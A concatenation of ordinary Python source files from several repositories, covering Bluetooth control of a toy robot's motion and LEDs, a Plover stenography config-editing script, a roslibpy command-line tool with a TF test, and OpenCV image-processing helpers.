elif(action_num == "action4"):
data[1] = 0x04
elif(action_num == "action5"):
data[1] = 0x05
elif(action_num == "action6"):
data[1] = 0x06
elif(action_num == "random"):
data[1] = random.randint(1, 6)
self.call.blewrite(data)
def dance(self, action_num):
data = [0x12, 0x01]
if(action_num == "dance1"):
data[1] = 0x01
elif(action_num == "dance2"):
data[1] = 0x02
elif(action_num == "dance3"):
data[1] = 0x03
elif(action_num == "dance4"):
data[1] = 0x04
elif(action_num == "dance5"):
data[1] = 0x05
elif(action_num == "dance6"):
data[1] = 0x06
elif(action_num == "random"):
data[1] = random.randint(1, 6)
self.call.blewrite(data)
```
#### File: python/matatabot/leds.py
```python
import sys
import math
import random
class leds:
def __init__(self, call):
self.call = call
def show_next1(self, color, index):
data = [0x22, 0x01]
self.call.blewrite(data)
self.call.blewait()
def show_single(self, leftright, r, g, b):
data = [0x17, 0x01, 0x00, 0x00, 0x00]
if(leftright == "left"):
data[1] = 0x01
elif(leftright == "right"):
data[1] = 0x02
elif(leftright == "all"):
data[1] = 0x03
data[2] = r
data[3] = g
data[4] = b
self.call.blewrite(data)
self.call.blewait()
def show_all(self, r, g, b):
data = [0x17, 0x01, 0x00, 0x00, 0x00]
data[1] = 0x03
data[2] = r
data[3] = g
data[4] = b
self.call.blewrite(data)
self.call.blewait()
def color(self, value):
digit = list(map(str, range(10)))+list("abcdef")
if(isinstance(value, tuple)):
string = '#'
for i in value:
a1 = i//16
a2 = i % 16
string += digit[a1]+digit[a2]
return string
elif isinstance(value, str):
a1 = digit.index(value[1])*16+digit.index(value[2])
a2 = digit.index(value[3])*16+digit.index(value[4])
a3 = digit.index(value[5])*16+digit.index(value[6])
return [a1, a2, a3]
def trun_ring(self, buf, col):
arr = self.color(col)
buf.append(arr[0])
buf.append(arr[1])
buf.append(arr[2])
return buf
def show_all_hex(self, color):
data = [0x17, 0x03]
data = self.trun_ring(data, color)
self.call.blewrite(data)
self.call.blewait()
def show_single_hex(self, index, color):
data = [0x17, 0x01]
if(index == "left"):
data[1] = 0x01
elif(index == "right"):
data[1] = 0x02
elif(index == "all"):
data[1] = 0x03
data = self.trun_ring(data, color)
self.call.blewrite(data)
self.call.blewait()
def clear(self):
data = [0x17, 0x03, 0x00, 0x00, 0x00]
self.call.blewrite(data)
self.call.blewait()
```
#### File: python/matatabot/motion.py
```python
import sys
import math
import random
class motion:
def __init__(self, call):
self.call = call
def forward_step(self, step):
data = [0x10, 0x01, 0x00, 0x00]
mm = 100
data[2] = mm//256
data[3] = mm % 256
for i in range(0, step):
self.call.blewrite(data)
self.call.blewait(0x88)
def forward(self, step):
data = [0x10, 0x01, 0x00, 0x00]
mm = None
if isinstance(step, (int, float)):
mm = round(step)
mm = mm*10
elif isinstance(step, str):
if(step == "step_1"):
self.forward_step(1)
return
elif(step == "step_2"):
self.forward_step(2)
return
elif(step == "step_3"):
self.forward_step(3)
return
elif(step == "step_4"):
self.forward_step(4)
return
elif(step == "step_5"):
self.forward_step(5)
return
elif(step == "step_6"):
self.forward_step(6)
return
elif(step == "random_step"):
mm = random.randint(1, 6)
self.forward_step(mm)
return
elif(step == "random"):
mm = random.randint(1, 6)
mm = mm*100
if(mm == None):
pass
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait(0x88)
def backward_step(self, step):
data = [0x10, 0x02, 0x00, 0x00]
mm = 100
data[2] = mm//256
data[3] = mm % 256
for i in range(0, step):
self.call.blewrite(data)
self.call.blewait(0x88)
def backward(self, step):
data = [0x10, 0x02, 0x00, 0x00]
mm = None
if isinstance(step, int):
mm = step
mm = mm*10
elif isinstance(step, float):
mm = round(step)
mm = mm*10
elif isinstance(step, str):
if(step == "step_1"):
self.backward_step(1)
return
elif(step == "step_2"):
self.backward_step(2)
return
elif(step == "step_3"):
self.backward_step(3)
return
elif(step == "step_4"):
self.backward_step(4)
return
elif(step == "step_5"):
self.backward_step(5)
return
elif(step == "step_6"):
self.backward_step(6)
return
elif(step == "random_step"):
mm = random.randint(1, 6)
self.backward_step(mm)
return
elif(step == "random"):
mm = random.randint(1, 6)
mm = mm*100
else:
mm = 100
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait(0x88)
def turn_left(self, angle):
data = [0x10, 0x03, 0x00, 0x00]
mm = None
if isinstance(angle, int):
mm = angle
elif isinstance(angle, float):
mm = round(angle)
elif isinstance(angle, str):
if(angle == "random"):
mm = random.randint(30, 180)
elif(angle == "30degree"):
mm = 30
elif(angle == "36degree"):
mm = 36
elif(angle == "45degree"):
mm = 45
elif(angle == "60degree"):
mm = 60
elif(angle == "72degree"):
mm = 72
elif(angle == "90degree"):
mm = 90
elif(angle == "108degree"):
mm = 108
elif(angle == "120degree"):
mm = 120
elif(angle == "135degree"):
mm = 135
elif(angle == "145degree"):
mm = 145
elif(angle == "150degree"):
mm = 150
elif(angle == "180degree"):
mm = 180
else:
mm = 30
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def turn_right(self, angle: int):
data = [0x10, 0x04, 0x00, 0x00]
mm = None
if isinstance(angle, int):
mm = angle
elif isinstance(angle, float):
mm = round(angle)
elif isinstance(angle, str):
if(angle == "random"):
mm = random.randint(30, 180)
elif(angle == "30degree"):
mm = 30
elif(angle == "36degree"):
mm = 36
elif(angle == "45degree"):
mm = 45
elif(angle == "60degree"):
mm = 60
elif(angle == "72degree"):
mm = 72
elif(angle == "90degree"):
mm = 90
elif(angle == "108degree"):
mm = 108
elif(angle == "120degree"):
mm = 120
elif(angle == "135degree"):
mm = 135
elif(angle == "145degree"):
mm = 145
elif(angle == "150degree"):
mm = 150
elif(angle == "180degree"):
mm = 180
else:
mm = 30
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def move_position(self, position):
# print(str(position))
if(float(position) > 9999):
position = 9999
if(float(position) < -9999):
position = -9999
position = position*10
position = round(position)
data = [0x10, 0x01, 0x00, 0x00]
mm = None
if(position > 0):
data[1] = 0x01
if(position > 1000):
position = 1000
mm = position
else:
data[1] = 0x02
if(position < -1000):
position = -1000
mm = 0-position
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def move_angle(self, angle):
if(float(angle) > 9999):
angle = 9999
if(float(angle) < -9999):
angle = -9999
angle = round(angle)
data = [0x10, 0x03, 0x00, 0x00]
mm = None
if(angle > 0):
data[1] = 0x04
if(angle > 360):
angle = 360
mm = angle
else:
data[1] = 0x03
if(angle < -360):
angle = -360
mm = 0-angle
data[2] = mm//256
data[3] = mm % 256
self.call.blewrite(data)
self.call.blewait()
def move_speed(self, left_speed, right_speed):
left_s = 0
right_s = 0
data = [0x11, 0x03, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00]
if isinstance(left_speed, int):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, float):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, str):
if(left_speed == "gear_1"):
left_s = 70
elif(left_speed == "gear_2"):
left_s = 105
elif(left_speed == "gear_3"):
left_s = 140
elif(left_speed == "gear_4"):
left_s = 175
elif(left_speed == "gear_5"):
left_s = 210
elif(left_speed == "gear_6"):
left_s = 245
elif(left_speed == "inf"):
left_s = 245
elif(left_speed == "gear_stop"):
left_s = 0
elif(left_speed == "gear_random"):
a = random.randint(0, 5)
left_s = 70+35*a
elif(left_speed == "backgear_1"):
left_s = -70
elif(left_speed == "backgear_2"):
left_s = -105
elif(left_speed == "backgear_3"):
left_s = -140
elif(left_speed == "backgear_4"):
left_s = -175
elif(left_speed == "backgear_5"):
left_s = -175
elif(left_speed == "backgear_6"):
left_s = -210
elif(left_speed == "-inf"):
left_s = -210
elif(left_speed == "backgear_stop"):
left_s = 0
elif(left_speed == "backgear_random"):
a = random.randint(0, 5)
left_s = -70-35*a
if isinstance(right_speed, int):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, float):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, str):
if(right_speed == "gear_1"):
right_s = 70
elif(right_speed == "gear_2"):
right_s = 105
elif(right_speed == "gear_3"):
right_s = 140
elif(right_speed == "gear_4"):
right_s = 175
elif(right_speed == "gear_5"):
right_s = 210
elif(right_speed == "gear_6"):
right_s = 245
elif(right_speed == "inf"):
right_s = 245
elif(right_speed == "gear_stop"):
right_s = 0
elif(right_speed == "gear_random"):
a = random.randint(0, 5)
right_s = 70+35*a
elif(right_speed == "backgear_1"):
right_s = -70
elif(right_speed == "backgear_2"):
right_s = -105
elif(right_speed == "backgear_3"):
right_s = -140
elif(right_speed == "backgear_4"):
right_s = -175
elif(right_speed == "backgear_5"):
right_s = -175
elif(right_speed == "backgear_6"):
right_s = -210
elif(right_speed == "-inf"):
right_s = -210
elif(right_speed == "backgear_stop"):
right_s = 0
elif(right_speed == "backgear_random"):
a = random.randint(0, 5)
right_s = -70-35*a
if(left_s > 0):
left_s = left_s
data[2] = 0x01
else:
left_s = 0-left_s
data[2] = 0x02
if(right_s > 0):
right_s = right_s
data[5] = 0x01
else:
right_s = 0-right_s
data[5] = 0x02
left_s = round(left_s)
right_s = round(right_s)
data[3] = left_s//256
data[4] = left_s % 256
data[6] = right_s//256
data[7] = right_s % 256
self.call.blewrite(data)
def move_right_speed(self, right_speed):
right_s = 0
data = [0x11, 0x01, 0x01, 0x00, 0x00]
if isinstance(right_speed, int):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, float):
right_s = 144*right_speed/9.70
elif isinstance(right_speed, str):
if(right_speed == "gear_1"):
right_s = 70
elif(right_speed == "gear_2"):
right_s = 105
elif(right_speed == "gear_3"):
right_s = 140
elif(right_speed == "gear_4"):
right_s = 175
elif(right_speed == "gear_5"):
right_s = 210
elif(right_speed == "gear_6"):
right_s = 245
elif(right_speed == "inf"):
right_s = 245
elif(right_speed == "gear_stop"):
right_s = 0
elif(right_speed == "gear_random"):
a = random.randint(0, 5)
right_s = 70+35*a
elif(right_speed == "backgear_1"):
right_s = -70
elif(right_speed == "backgear_2"):
right_s = -105
elif(right_speed == "backgear_3"):
right_s = -140
elif(right_speed == "backgear_4"):
right_s = -175
elif(right_speed == "backgear_5"):
right_s = -175
elif(right_speed == "backgear_6"):
right_s = -210
elif(right_speed == "-inf"):
right_s = -210
elif(right_speed == "backgear_stop"):
right_s = 0
elif(right_speed == "backgear_random"):
a = random.randint(0, 5)
right_s = -70-35*a
if(right_s > 0):
right_s = right_s
data[2] = 0x01
else:
right_s = 0-right_s
data[2] = 0x02
right_s = round(right_s)
data[3] = right_s//256
data[4] = right_s % 256
self.call.blewrite(data)
def move_left_speed(self, left_speed):
left_s = 0
data = [0x11, 0x02, 0x01, 0x00, 0x00]
if isinstance(left_speed, int):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, float):
left_s = 144*left_speed/9.70
elif isinstance(left_speed, str):
if(left_speed == "gear_1"):
left_s = 70
elif(left_speed == "gear_2"):
left_s = 105
elif(left_speed == "gear_3"):
left_s = 140
elif(left_speed == "gear_4"):
left_s = 175
elif(left_speed == "gear_5"):
left_s = 210
elif(left_speed == "gear_6"):
left_s = 245
elif(left_speed == "inf"):
left_s = 245
elif(left_speed == "gear_stop"):
left_s = 0
elif(left_speed == "gear_random"):
a = random.randint(0, 5)
left_s = 70+35*a
elif(left_speed == "backgear_1"):
left_s = -70
elif(left_speed == "backgear_2"):
left_s = -105
elif(left_speed == "backgear_3"):
left_s = -140
elif(left_speed == "backgear_4"):
left_s = -175
elif(left_speed == "backgear_5"):
left_s = -175
elif(left_speed == "backgear_6"):
left_s = -210
elif(left_speed == "-inf"):
left_s = -210
elif(left_speed == "backgear_stop"):
left_s = 0
elif(left_speed == "backgear_random"):
a = random.randint(0, 5)
left_s = -70-35*a
if(left_s > 0):
left_s = left_s
data[2] = 0x01
else:
left_s = 0-left_s
data[2] = 0x02
left_s = round(left_s)
data[3] = left_s//256
data[4] = left_s % 256
self.call.blewrite(data)
def stop(self, wheel):
data = None
if(wheel == "left"):
data = [0x11, 0x01, 0x01, 0x00, 0x00]
elif(wheel == "right"):
data = [0x11, 0x02, 0x01, 0x00, 0x00]
elif(wheel == "all"):
data = [0x11, 0x03, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00]
else:
data = [0x11, 0x03, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00]
self.call.blewrite(data)
```
|
{
"source": "jeandeaual/dotfiles",
"score": 3
}
|
#### File: .chezmoitemplates/Plover/modify_plover.cfg.py
```python
from __future__ import annotations
from configparser import ConfigParser, NoOptionError, NoSectionError
from enum import Enum, unique
from json import dumps
from sys import stdin, stdout
from typing import Any
@unique
class Section(Enum):
"""Plover configuration file sections."""
MACHINE_CONFIGURATION = "Machine Configuration"
TX_BOLT = "TX Bolt"
GEMINI_PR = "Gemini PR"
OUTPUT_CONFIGURATION = "Output Configuration"
TRANSLATION_FRAME = "Translation Frame"
STROKE_DISPLAY = "Stroke Display"
SYSTEM = "System"
SUGGESTIONS_DISPLAY = "Suggestions Display"
GUI = "GUI"
LOGGING_CONFIGURATION = "Logging Configuration"
KEYBOARD = "Keyboard"
STARTUP = "Startup"
SYSTEM_ENGLISH = "System: English Stenotype"
SYSTEM_GRANDJEAN = "System: Grandjean"
@unique
class SpacePlacement(Enum):
"""Plover output configuration space placement options."""
BEFORE = "Before Output"
AFTER = "After Output"
def set_config_value(
config: ConfigParser, section: Section, option: str, value: Any
):
"""
Set a configuration value.
:param section: The section of the configuration to set.
:param option: The option to set.
:param value: The value to set.
"""
str_value = str(value)
try:
current_value = config.get(section.value, option)
if current_value != str_value:
config.set(section.value, option, str_value)
except NoSectionError:
config.add_section(section.value)
config.set(section.value, option, str_value)
except NoOptionError:
config.set(section.value, option, str_value)
def set_json_config_value(
config: ConfigParser, section: Section, option: str, value: Any
):
"""
Set a JSON configuration value.
:param section: The section of the configuration to set.
:param option: The option to set.
:param value: The value to set.
"""
set_config_value(config, section, option, dumps(value))
# Read the configuration
config = ConfigParser()
config.read_file(stdin)
section = Section.MACHINE_CONFIGURATION
set_config_value(config, section, "auto_start", True)
section = Section.OUTPUT_CONFIGURATION
set_config_value(config, section, "undo_levels", 100)
set_config_value(config, section, "start_attached", True)
set_config_value(config, section, "start_capitalized", True)
set_config_value(config, section, "space_placement", SpacePlacement.BEFORE)
section = Section.STROKE_DISPLAY
set_config_value(config, section, "show", True)
section = Section.SUGGESTIONS_DISPLAY
set_config_value(config, section, "show", True)
section = Section.GUI
set_config_value(config, section, "classic_dictionaries_display_order", False)
section = Section.SYSTEM_ENGLISH
set_json_config_value(
config,
section,
"dictionaries",
[
{
"enabled": True,
"path": dictionary_path,
}
for dictionary_path in [
"show-strokes.py",
"user-commands.json",
"user.json",
"emoji.json",
"punctuation.json",
"numbers.json",
"fingerspelling.json",
"dict.json",
"condensed-strokes.json",
"condensed-strokes-fingerspelled.json",
]
],
)
# Default QWERTY configuration
set_json_config_value(
config,
section,
"keymap[keyboard]",
[
[
"#",
["1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "-", "="],
],
[
"S-",
["q", "a"],
],
[
"T-",
["w"],
],
[
"K-",
["s"],
],
[
"P-",
["e"],
],
[
"W-",
["d"],
],
[
"H-",
["r"],
],
[
"R-",
["f"],
],
[
"A-",
["c"],
],
[
"O-",
["v"],
],
[
"*",
["t", "y", "g", "h"],
],
[
"-E",
["n"],
],
[
"-U",
["m"],
],
[
"-F",
["u"],
],
[
"-R",
["j"],
],
[
"-P",
["i"],
],
[
"-B",
["k"],
],
[
"-L",
["o"],
],
[
"-G",
["l"],
],
[
"-T",
["p"],
],
[
"-S",
[";"],
],
[
"-D",
["["],
],
[
"-Z",
["'"],
],
[
"arpeggiate",
["space"],
],
[
"no-op",
["\\", "]", "z", "x", "b", ",", ".", "/"],
],
],
)
# Default configuration
set_json_config_value(
config,
section,
"keymap[tx bolt]",
[
[
"#",
["#"],
],
[
"S-",
["S-"],
],
[
"T-",
["T-"],
],
[
"K-",
["K-"],
],
[
"P-",
["P-"],
],
[
"W-",
["W-"],
],
[
"H-",
["H-"],
],
[
"R-",
["R-"],
],
[
"A-",
["A-"],
],
[
"O-",
["O-"],
],
[
"*",
["*"],
],
[
"-E",
["-E"],
],
[
"-U",
["-U"],
],
[
"-F",
["-F"],
],
[
"-R",
["-R"],
],
[
"-P",
["-P"],
],
[
"-B",
["-B"],
],
[
"-L",
["-L"],
],
[
"-G",
["-G"],
],
[
"-T",
["-T"],
],
[
"-S",
["-S"],
],
[
"-D",
["-D"],
],
[
"-Z",
["-Z"],
],
[
"no-op",
[],
],
],
)
# Default configuration
set_json_config_value(
config,
section,
"keymap[gemini pr]",
[
[
"#",
[
"#1",
"#2",
"#3",
"#4",
"#5",
"#6",
"#7",
"#8",
"#9",
"#A",
"#B",
"#C",
],
],
[
"S-",
["S1-", "S2-"],
],
[
"T-",
["T-"],
],
[
"K-",
["K-"],
],
[
"P-",
["P-"],
],
[
"W-",
["W-"],
],
[
"H-",
["H-"],
],
[
"R-",
["R-"],
],
[
"A-",
["A-"],
],
[
"O-",
["O-"],
],
[
"*",
["*1", "*3", "*2", "*4"],
],
[
"-E",
["-E"],
],
[
"-U",
["-U"],
],
[
"-F",
["-F"],
],
[
"-R",
["-R"],
],
[
"-P",
["-P"],
],
[
"-B",
["-B"],
],
[
"-L",
["-L"],
],
[
"-G",
["-G"],
],
[
"-T",
["-T"],
],
[
"-S",
["-S"],
],
[
"-D",
["-D"],
],
[
"-Z",
["-Z"],
],
[
"no-op",
["Fn", "pwr", "res1", "res2"],
],
],
)
section = Section.SYSTEM_GRANDJEAN
set_json_config_value(
config,
section,
"dictionaries",
[
{
"enabled": True,
"path": dictionary_path,
}
for dictionary_path in [
"french-user.json",
"07_french_user.json",
"06_french_verbes.json",
"05_french_noms.json",
"04_french_adjectifs.json",
"03_french_adverbes.json",
"02_french_chiffres.json",
"01_french_sion.json",
]
],
)
# Default QWERTY configuration
set_json_config_value(
config,
section,
"keymap[keyboard]",
[
[
"S-",
["q"],
],
[
"K-",
["a"],
],
[
"P-",
["w"],
],
[
"M-",
["s"],
],
[
"T-",
["e"],
],
[
"F-",
["d"],
],
[
"*",
["r"],
],
[
"R-",
["f"],
],
[
"N-",
["t"],
],
[
"L-",
["g", "v"],
],
[
"Y-",
["h", "b"],
],
[
"-O",
["y"],
],
[
"-E",
["n"],
],
[
"-A",
["u"],
],
[
"-U",
["j"],
],
[
"-I",
["i"],
],
[
"-l",
["k"],
],
[
"-n",
["o"],
],
[
"-$",
["l"],
],
[
"-D",
["p"],
],
[
"-C",
[","],
],
[
"arpeggiate",
["space"],
],
[
"no-op",
[],
],
],
)
# Configuration for the Splitography
set_json_config_value(
config,
section,
"keymap[gemini pr]",
[
[
"S-",
["S1-"],
],
[
"K-",
["S2-"],
],
[
"P-",
["T-"],
],
[
"M-",
["K-"],
],
[
"T-",
["P-"],
],
[
"F-",
["W-"],
],
[
"*",
["H-"],
],
[
"R-",
["R-", "A-"],
],
[
"N-",
["*1"],
],
[
"L-",
["O-"],
],
[
"Y-",
["*2", "*4"],
],
[
"-O",
["*3"],
],
[
"-E",
["-E"],
],
[
"-A",
["-F"],
],
[
"-U",
["-R", "-U"],
],
[
"-I",
["-P"],
],
[
"-l",
["-B"],
],
[
"-n",
["-L"],
],
[
"-$",
["-G"],
],
[
"-D",
["-T"],
],
[
"-C",
["-S"],
],
[
"no-op",
[],
],
],
)
# Write the configuration
config.write(stdout)
```
|
{
"source": "jeandeaual/roslibpy",
"score": 2
}
|
#### File: src/roslibpy/__main__.py
```python
import json
import roslibpy
def rostopic_list(ros, **kwargs):
for topic in ros.get_topics():
print(topic)
def rostopic_type(ros, topic, **kwargs):
topic_type = ros.get_topic_type(topic)
print(topic_type)
def rostopic_find(ros, type, **kwargs):
for topic in ros.get_topics_for_type(type):
print(topic)
def rosmsg_info(ros, type, **kwargs):
typedef = ros.get_message_details(type)
_print_type(typedef)
def rosservice_list(ros, **kwargs):
for service in ros.get_services():
print(service)
def rosservice_type(ros, service, **kwargs):
service_type = ros.get_service_type(service)
print(service_type)
def rosservice_find(ros, type, **kwargs):
for service in ros.get_services_for_type(type):
print(service)
def rossrv_info(ros, type, **kwargs):
_print_type(ros.get_service_request_details(type))
print('---')
_print_type(ros.get_service_response_details(type))
def rosservice_info(ros, service, **kwargs):
type_name = ros.get_service_type(service)
print('Type: %s\n' % type_name)
print('Message definition')
print('------------------')
rossrv_info(ros, type_name)
def rosparam_list(ros, **kwargs):
for param in ros.get_params():
print(param)
def rosparam_set(ros, param, value, **kwargs):
ros.set_param(param, json.loads(value))
def rosparam_get(ros, param, **kwargs):
print(ros.get_param(param))
def rosparam_delete(ros, param, **kwargs):
ros.delete_param(param)
def _print_typedef(typedef, def_map, level):
defs = def_map[typedef]
for fname, ftype, flen in zip(defs['fieldnames'], defs['fieldtypes'], defs['fieldarraylen']):
if flen == -1:
ftype_info = ftype
elif flen == 0:
ftype_info = ftype + '[]'
else:
ftype_info = '%s[%d]' % (ftype, flen)
print('%s%s %s' % (' ' * level, ftype_info, fname))
if ftype in def_map:
_print_typedef(ftype, def_map, level + 1)
def _print_type(typedata):
if len(typedata['typedefs']) == 0:
return
main_type = typedata['typedefs'][0]['type']
def_map = {typedef['type']: typedef for typedef in typedata['typedefs']}
_print_typedef(main_type, def_map, 0)
def main():
import argparse
parser = argparse.ArgumentParser(description='roslibpy command-line utility')
commands = parser.add_subparsers(help='commands')
# Command: topic
topic_command = commands.add_parser('topic', help='ROS Topics')
topic_subcommands = topic_command.add_subparsers(help='ROS topic commands')
topic_list_parser = topic_subcommands.add_parser('list', help='List available ROS topics')
topic_list_parser.set_defaults(func=rostopic_list)
topic_type_parser = topic_subcommands.add_parser('type', help='ROS topic type')
topic_type_parser.add_argument('topic', action='store', type=str, help='Topic name')
topic_type_parser.set_defaults(func=rostopic_type)
topic_find_parser = topic_subcommands.add_parser('find', help='ROS topics by type')
topic_find_parser.add_argument('type', action='store', type=str, help='Type name')
topic_find_parser.set_defaults(func=rostopic_find)
# Command: msg
msg_command = commands.add_parser('msg', help='ROS Message type information')
msg_subcommands = msg_command.add_subparsers(help='ROS Message type commands')
msg_info_parser = msg_subcommands.add_parser('info', help='ROS message type information')
msg_info_parser.add_argument('type', action='store', type=str, help='Message type')
msg_info_parser.set_defaults(func=rosmsg_info)
# Command: service
service_command = commands.add_parser('service', help='ROS Services')
service_subcommands = service_command.add_subparsers(help='ROS service commands')
service_list_parser = service_subcommands.add_parser('list', help='List available ROS services')
service_list_parser.set_defaults(func=rosservice_list)
service_type_parser = service_subcommands.add_parser('type', help='ROS service type')
service_type_parser.add_argument('service', action='store', type=str, help='Service name')
service_type_parser.set_defaults(func=rosservice_type)
service_find_parser = service_subcommands.add_parser('find', help='ROS services by type')
service_find_parser.add_argument('type', action='store', type=str, help='Type name')
service_find_parser.set_defaults(func=rosservice_find)
service_info_parser = service_subcommands.add_parser('info', help='ROS service information')
service_info_parser.add_argument('service', action='store', type=str, help='Service name')
service_info_parser.set_defaults(func=rosservice_info)
# Command: srv
srv_command = commands.add_parser('srv', help='ROS Service type information')
srv_subcommands = srv_command.add_subparsers(help='ROS service type commands')
srv_info_parser = srv_subcommands.add_parser('info', help='ROS service type information')
srv_info_parser.add_argument('type', action='store', type=str, help='Service type')
srv_info_parser.set_defaults(func=rossrv_info)
# Command: param
param_command = commands.add_parser('param', help='ROS Params')
param_subcommands = param_command.add_subparsers(help='ROS parameter commands')
param_list_parser = param_subcommands.add_parser('list', help='List available ROS parameters')
param_list_parser.set_defaults(func=rosparam_list)
param_set_parser = param_subcommands.add_parser('set', help='Set ROS param value')
param_set_parser.add_argument('param', action='store', type=str, help='Param name')
param_set_parser.add_argument('value', action='store', type=str, help='Param value')
param_set_parser.set_defaults(func=rosparam_set)
param_get_parser = param_subcommands.add_parser('get', help='Get ROS param value')
param_get_parser.add_argument('param', action='store', type=str, help='Param name')
param_get_parser.set_defaults(func=rosparam_get)
param_delete_parser = param_subcommands.add_parser('delete', help='Delete ROS param')
param_delete_parser.add_argument('param', action='store', type=str, help='Param name')
param_delete_parser.set_defaults(func=rosparam_delete)
# Invoke
ros = roslibpy.Ros('localhost', 9090)
try:
ros.run()
args = parser.parse_args()
args.func(ros, **vars(args))
finally:
ros.terminate()
if __name__ == '__main__':
main()
```
#### File: roslibpy/tests/test_tf.py
```python
import helpers
from roslibpy import Ros
from roslibpy.tf import TFClient
def run_tf_test():
context = {'counter': 0}
ros_client = Ros('127.0.0.1', 9090)
tf_client = TFClient(ros_client, fixed_frame='world')
def callback(message):
assert message['translation'] == dict(x=0.0, y=0.0, z=0.0), 'Unexpected translation received'
assert message['rotation'] == dict(x=0.0, y=0.0, z=0.0, w=1.0), 'Unexpected rotation received'
context['counter'] += 1
ros_client.terminate()
tf_client.subscribe(frame_id='/world', callback=callback)
ros_client.call_later(2, ros_client.terminate)
ros_client.run_forever()
assert context['counter'] > 0
def test_tf_test():
helpers.run_as_process(run_tf_test)
if __name__ == '__main__':
import logging
logging.basicConfig(
level=logging.INFO, format='[%(thread)03d] %(asctime)-15s [%(levelname)s] %(message)s')
run_tf_test()
```
|
{
"source": "jeandemeusy/jdu_args",
"score": 2
}
|
#### File: jdu_args/jduargs/result.py
```python
class Result:
"""Class description."""
def __init__(self):
"""
Initialization of the class.
"""
pass
def __str__(self):
return
```
|
{
"source": "jeandemeusy/jdu_image",
"score": 3
}
|
#### File: jdu_image/jduimage/_generalMixin.py
```python
import cv2 as cv
import numpy as np
from typing import List
class GeneralMixin:
def channel(self, c: int) -> None:
"""Selects one channel among the image's.
Parameters
----------
c : int
Channels index to access
"""
if self.dim != 2:
channels = cv.split(self.data)
self.data = channels[c]
def split(self, direction: str = "h", position: int or str = "mid") -> None:
"""Split the image.
Parameters
----------
direction: {"h","horizontal","v","vertical"}
split direction
position int or str
index where to split, or "mid" if the split has to be centered (default is "mid")
"""
if direction not in ["h", "horizontal", "v", "vertical"]:
raise ValueError("Wrong orientation")
tl1 = [0, 0]
br2 = [self.height, self.width]
if direction in ["h", "horizontal"]:
if position == "mid":
position = self.height // 2
br1 = [position, self.width]
tl2 = [position, 0]
if direction in ["v", "vertical"]:
if position == "mid":
position = self.width // 2
br1 = [self.height, position]
tl2 = [0, position]
first = self.crop(tl1, br1, False)
secon = self.crop(tl2, br2, False)
return first, secon
def negate(self) -> None:
"""Inverts the image. Only works on 2D images."""
if self.dim != 2:
raise ValueError("Negation only on 2D images")
self.data = ~self.data
def blur(self, size: int = 5, method: str = "gauss") -> None:
"""Blurs the image. The method and filter size can be chosen.
Parameters
----------
size : int, optional
Size of the filter (default is 5)
method: { "gauss", "average", "median","bilateral"}
Blurring methods
"""
if method not in ["gauss", "average", "median", "bilateral"]:
raise ValueError("Unexpected method")
if size < 3:
raise ValueError("Size too small, must be bigger than 3.")
if size % 2 == 0:
raise ValueError("Size must be odd")
if method == "gauss":
self.data = cv.GaussianBlur(self.data, (size, size), 0)
elif method == "average":
self.data = cv.blur(self.data, (size, size))
elif method == "median":
self.data = cv.medianBlur(self.data, size)
elif method == "bilateral":
self.data = cv.bilateralFilter(self.data, size, 100, 100)
def gaussian_blur(self, size: int, sigma: float) -> None:
"""Applies gaussian blur to the image.
Parameters
---------
size: int
size of the kernel
sigma: float
standard deviation of the kernel
"""
self.data = cv.GaussianBlur(self.data, (size, size), sigma)
def resize(self, param: str, value: float, inter: int = cv.INTER_AREA) -> None:
"""Resizes the image. When changing height (respectively width), width (respectively height) change so that the ratio stays the same.
Parameters
----------
param: { "height", "width", "ratio" }
Which output dimensions will be set
value: float
Output dimensions specified by param value
inter: int
Interpolation method (default is cv.INTER_AREA)
"""
if param not in ["width", "height", "ratio"]:
raise ValueError("Unexpected parameter")
if value <= 0:
raise ValueError("Value must be bigger than 0")
dim = None
(h, w) = self.shape[:2]
if param == "height":
r = int(value) / float(h)
dim = (int(w * r), int(value))
elif param == "width":
r = int(value) / float(w)
dim = (int(value), int(h * r))
elif param == "ratio":
dim = (int(w * value), int(h * value))
else:
dim = (w, h)
self.data = cv.resize(self.data, dim, interpolation=inter)
def full_resize(self, dim: List[int], inter: int = cv.INTER_AREA) -> None:
"""Resize the image to the given dimensions, without keeping aspect ratio.
Parameters
----------
dim: list of int
Desired image dimensions
inter: int
openCV interpolation method (default is cv.INTER_AREA)
"""
self.data = cv.resize(self.data, dim, interpolation=inter)
def rotate90(self):
"""rotate the image at 90degrees clockwise"""
self.data = cv.rotate(self.data, cv.ROTATE_90_CLOCKWISE)
def rotate(self, angle: float, center: List[int]):
"""Rotate the image wtha given angle.
Parameters
----------
angle: float
Angle of rotation in degrees
center: list of int
(x,y) rotation center coordinate
"""
rot_mat = cv.getRotationMatrix2D(center, 1.0 * angle, 1.0)
self.data = cv.warpAffine(
self.data, rot_mat, self.shape[1::-1], flags=cv.INTER_NEAREST
)
def equalize_hist(self, rate: float) -> None:
"""Equalizes the histogram of intensities of the image. It increases the contrast of the image. Only works on 2D images.
Parameters
----------
rate: float
Proportion of the histogram to remove to the left and right
"""
if self.dim != 2:
raise ValueError("Equalize only on 2D images")
self.data = cv.equalizeHist(self.data.astype(np.uint8))
hist = np.cumsum(np.histogram(self.data, 255)[0])
lowest_value = np.where((rate * hist[-1]) <= hist)[0][0]
highest_value = np.where(((1 - rate) * hist[-1]) >= hist)[0][-1]
self.data[self.data < lowest_value] = lowest_value
self.data[self.data > highest_value] = highest_value
def distance_transform(self) -> None:
"""Computes distances transformation, i.e. for each black pixel, computes the shortest distances to a white pixel. Only works on 2D images."""
if self.dim != 2:
raise ValueError("Distance transform only on 2D images")
self.data = cv.distanceTransform(self.data, cv.DIST_L2, 3)
